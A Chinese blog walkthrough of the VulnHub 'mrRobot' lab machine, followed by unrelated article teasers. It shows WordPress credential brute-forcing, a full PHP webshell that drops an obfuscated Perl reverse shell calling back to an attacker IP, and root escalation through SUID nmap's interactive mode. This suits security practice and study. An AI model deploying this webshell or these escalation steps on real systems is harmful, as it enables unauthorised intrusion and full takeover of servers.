当前位置：首页 > news >正文

VulnHub mrRobot

news 2026/1/30 12:18:10

一、信息收集

1.访问地址

没啥信息，尝试扫下目录

2.目录扫描

key1

发现有wp-admin/和robots.txt

robots.txt里面还拿到了一个密码字典，猜测是爆破wp的网站账号密码的

3.访问wp-admin/

┌──(root💀kali)-[~/桌面]
└─# sort -u fsocity.dic > wp.txt

利用burp爆破，发现账号和密码：

账号：elliot
密码：ER28-0652

二、漏洞利用

1.修改404.php 写入webshell

木马：

<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.103.129";
$yourport = '4444';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>

2.反弹shell

┌──(root💀kali)-[~/桌面]
└─# nc -lvvp 4444 再访问404.php，就可以进行反弹shell了
http://192.168.103.183/404.phppython3 -c 'import pty; pty.spawn("/bin/bash")'  #交互式shell

3.拿key2

在robot目录下有key2，但是直接访问没权限

但是有一个md5加密的密码，所以猜测md5解密以后

可以利用ssh远程登录

MD5免费在线解密破解_MD5在线加密-SOMD5

密码：

abcdefghijklmnopqrstuvwxyz

三、SUID提权

1.查看只有SUID的二进制可执行文件
find / -user root -perm -4000 -print 2>/dev/null2.已知的可用来提权的linux可行性的文件列表如下：
nmap、Vim、find、bash、more、less、Nano、cp3.进入namp可交互式模式（仅限2.02-5.21版本）
nmap --interactive4.提权root
! sh

1.nmap交互式

1.进入namp可交互式模式（仅限2.02-5.21版本）
nmap --interactive2.提权root
! sh

2.key3

VulnHub mrRobot

一、信息收集 1.访问地址没啥信息，尝试扫下目录 2.目录扫描 key1 发现有wp-admin/和robots.txt robots.txt里面还拿到了一个密码字典，猜测是爆破wp的网站账号密码的 3.访问wp-admin/ ┌──(root💀kali)-[~/桌面] └─# sort -u fsoci…...

编程日记 2023/10/19 18:44:02

【MATLAB第79期】基于MATLAB的数据抽样合集（sobol、LHS、Halton、正交、随机函数）更新中

【MATLAB第79期】基于MATLAB的数据抽样合集（sobol、LHS、Halton、正交、随机函数）更新中一、随机函数 1.指定区间随机生成数据（小数） [a b]区间随机数生成: Aa(b-a)rand(m,n) m：待生成矩阵A的行数 n: 待生成矩阵A…...

编程日记 2023/10/19 18:43:01

Lua快速入门教程

文章目录 1、Linux安装Lua2、语法练习2.1、变量2.2、循环2.3、函数2.4、数组2.5、迭代器2.6、Table操作2.7、Lua 模块与包2.8、加载机制2.9、Lua 元表(Metatable) 3、Lua 协同程序(coroutine)4、文件IO操作4.1、简单模式4.2、完全模式 5、错误处理内容来源菜鸟教程&#xff0c…...

编程日记 2023/10/19 18:40:59

html资源提示符

前言：正常dom解析中遇到script标签 ，会暂停主线程去下载js，拿到资源后，主线程再执行js。那么主线程在等待网络线程下载这个空闲很浪费解决方案： script标签增加属性 async defer 1.async <script src"./i…...

编程日记 2023/10/19 18:39:58

VR智能家居虚拟连接仿真培训系统重塑传统家居行业

家居行业基于对场景的打造及设计，拥有广阔前景，是众多行业里面成为最有可能进行元宇宙落地的应用场景之一。家居行业十分注重场景的打造及设计，而元宇宙恰恰能通过将人工智能、虚拟现实、大数据、物联网等技术融合提升，带来身临其…...

编程日记 2023/10/19 18:38:56

0、常见问题 1. 所有配置完成后运行defects4j info -p Lang测试出现错误 Cant locate DBI.pm in INC (you may need to install the DBI module) (INC contains: /myproject/defects4j/framework/lib /myproject/defects4j/framework /myproject/defects4j/framework/core /m…...

编程日记 2023/10/19 18:37:55

vant_ CountDown倒计时

语法可以直接在官网查看需求后端返回的数据格式如下 [{"id": 1,"btn_text": "1","second": 0},{"id": 2,"btn_text": "1","second": 0}... ]之前约定second最多30s， 因此只需…...

编程日记 2023/10/19 18:36:54

spark集成hive

集群使用ambarihdp方式进行部署,集群的相关版本号如下所示: ambari版本 Version 2.7.4.0 HDP版本 HDP-3.1.4.0 hive版本 3.1.0 spark版本 2.3.0 集群前提条件: 1.Hdp、Spark、Hive都已部署好 2.Hive数据层建好，在Hdfs生成相应各层目录，后面配…...

编程日记 2023/10/19 18:33:51

提升微服务稳定性与性能：深入剖析Netflix Hystrix框架

说到 Netflix Hystrix 框架，一定离不开 com.netflix.hystrix.HystrixCommand，这个类是 Netflix 开源的 Hystrix 框架中的一个关键类，用于实现服务的容错和熔断功能。它主要用于将远程服务调用封装成一个独立的命令对象，以便于进行…...

编程日记 2023/10/19 18:32:50

IT运维管理系统在国有大型企业网络中的应用和可以解决的问题

随着国有大型企业业务的快速发展，网络运维管理面临着诸多挑战。本文将从问题概述、解决方案、监控易优势、实际案例和总结等方面阐述IT运维管理系统在国有大型企业网络中的应用和可以解决的问题。IT运维管理系统：国有大型企业网络的变革者与解决之道一…...

编程日记 2023/10/19 18:31:49

嵌入式实时操作系统的设计与开发（线程操作学习）

在aCoral操作系统中，线程退出采用了和Linux一样的方式，线程函数不用死等或显示调用退出相关函数，也就是说用户不用担心函数执行完后的事情。 uc/OS II任务函数与退出 void test(void *ptr){Do_something();while(1); }void test(void *ptr)…...

编程日记 2023/10/19 18:30:48

竞赛深度学习交通车辆流量分析 - 目标检测与跟踪 - python opencv

文章目录 0 前言1 课题背景2 实现效果3 DeepSORT车辆跟踪3.1 Deep SORT多目标跟踪算法3.2 算法流程 4 YOLOV5算法4.1 网络架构图4.2 输入端4.3 基准网络4.4 Neck网络4.5 Head输出层 5 最后 0 前言 🔥 优质竞赛项目系列，今天要分享的是 🚩 *…...

编程日记 2023/10/19 18:29:47

【RTOS学习】同步与互斥 | 队列

🐱作者：一只大喵咪1201 🐱专栏：《RTOS学习》 🔥格言：你只管努力，剩下的交给时间！ 同步与互斥 | 队列 🍉同步与互斥🍦同步🍦互斥 🍉队…...

编程日记 2023/10/19 18:28:46

Python订单生成器+队列+异步提高性能和容错

以下代码实现了一个订单生成器，使用 asyncio 和 aioredis 库实现了高并发地生成订单，并将新增订单异步更新到数据库。具体实现流程如下： 初始化 OrderGenerator 类。传入 Redis 服务器地址和并发数，在初始化函数中设置并发数和一…...

编程日记 2023/10/19 18:27:45

理德名人故事：全球投资之父-约翰.邓普顿

说到约翰‧邓普顿，我们就会想到他的很多标签。比如全球投资之父、史上最成功的基金经理等等。他是邓普顿集团的创始人，一直被誉为全球最具智慧以及最受尊崇的投资者之一。福布斯资本家杂志称他为"全球投资之父"及"历史上最成功的基金经理…...

编程日记 2023/10/19 18:23:38

微前端三：qiankun 协作开发和上线部署

我们先看qiankun怎么上线部署： 我这边用的是yaml 文件在 rancher上部署的： base是基座，这里每个应用都是一个服务，这个还是跟之前一样并没有区别，那如何在一个域名上挂载多个服务呢？ 最开始我们主要是在in…...

编程日记 2023/10/19 18:22:37

HTML三叉戟，标签、元素、属性各个的意义是什么？

🌟🌟🌟 专栏详解 🎉 🎉 🎉 欢迎来到前端开发之旅专栏！ 不管你是完全小白，还是有一点经验的开发者，在这里你会了解到最简单易懂的语言，与你分享有关前端技术和…...

编程日记 2023/10/19 18:21:35

prometheus获取kubelet接口监控数据

一、前言 k8s集群的kubelet服务内部有自带的cadvisor服务用于收集k8s集群的监控数据，所以可以通过调用kubelet的接口就能获取pod的资源监控数据，在新版本的k8s中，kubelet的监控数据获取端口为10250端口，老版本的是10255端口二、…...

编程日记 2023/10/19 18:20:34

国产主控应用案例：汉王电子血压计-君正开发板

2023春季新品发布会上汉王科技发布柯氏音法电子血压计产品—汉王电子血压计，继嗅觉检测盒之后再次深度布局大健康领域。不同于当前市面上使用示波法原理的电子血压计，汉王电子血压计采用血压测量金标准中的柯氏音法，由此引领一场电子血压计领…...

编程日记 2023/10/19 18:19:34

万宾科技智能井盖传感器特点介绍

当谈论城市基础设施的管理和安全时，井盖通常不是第一项引人注目的话题。然而，传统井盖和智能井盖传感器之间的差异已经引起了城市规划者和工程师的广泛关注。这两种技术在功能、管理、安全和成本等多个方面存在着显著的差异。 WITBEE万宾智能井盖传感器E…...

编程日记 2023/10/19 18:18:33

linux之kylin系统nginx的安装

一、nginx的作用 1.可做高性能的web服务器直接处理静态资源（HTML/CSS/图片等），响应速度远超传统服务器类似apache支持高并发连接 2.反向代理服务器隐藏后端服务器IP地址，提高安全性 3.负载均衡服务器支持多种策略分发流量…...

编程新知 2026/1/18 3:11:35

STM32标准库-DMA直接存储器存取

文章目录一、DMA1.1简介1.2存储器映像1.3DMA框图1.4DMA基本结构1.5DMA请求1.6数据宽度与对齐1.7数据转运DMA1.8ADC扫描模式DMA 二、数据转运DMA2.1接线图2.2代码2.3相关API 一、DMA 1.1简介 DMA（Direct Memory Access）直接存储器存取 DMA可以提供外设…...

编程新知 2026/1/26 10:55:51

【快手拥抱开源】通过快手团队开源的 KwaiCoder-AutoThink-preview 解锁大语言模型的潜力

引言： 在人工智能快速发展的浪潮中，快手Kwaipilot团队推出的 KwaiCoder-AutoThink-preview 具有里程碑意义——这是首个公开的AutoThink大语言模型（LLM）。该模型代表着该领域的重大突破，通过独特方式融合思考与非思考…...

编程新知 2026/1/26 13:50:41

HTML前端开发：JavaScript 常用事件详解

作为前端开发的核心，JavaScript 事件是用户与网页交互的基础。以下是常见事件的详细说明和用法示例： 1. onclick - 点击事件当元素被单击时触发（左键点击） button.onclick function() {alert("按钮被点击了！&…...

编程新知 2025/11/10 10:45:11

k8s业务程序联调工具-KtConnect

概述原理工具作用是建立了一个从本地到集群的单向VPN，根据VPN原理，打通两个内网必然需要借助一个公共中继节点，ktconnect工具巧妙的利用k8s原生的portforward能力，简化了建立连接的过程，apiserver间接起到了中继节…...

编程新知 2026/1/29 8:50:01

Golang——7、包与接口详解

包与接口详解 1、Golang包详解1.1、Golang中包的定义和介绍1.2、Golang包管理工具go mod1.3、Golang中自定义包1.4、Golang中使用第三包1.5、init函数 2、接口详解2.1、接口的定义2.2、空接口2.3、类型断言2.4、结构体值接收者和指针接收者实现接口的区别2.5、一个结构体实现多…...

编程新知 2026/1/26 0:37:00